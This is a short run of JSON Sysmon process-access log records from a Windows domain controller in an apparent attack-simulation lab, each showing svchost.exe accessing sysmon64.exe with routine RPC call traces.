{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5406,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.203\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.203","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5407,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.203\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.203","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5408,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.203\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.203","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5409,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.203\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.203","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5410,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.203\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.203","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5411,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.203\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.203","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5412,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.203\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.203","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5413,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.203\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.203","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
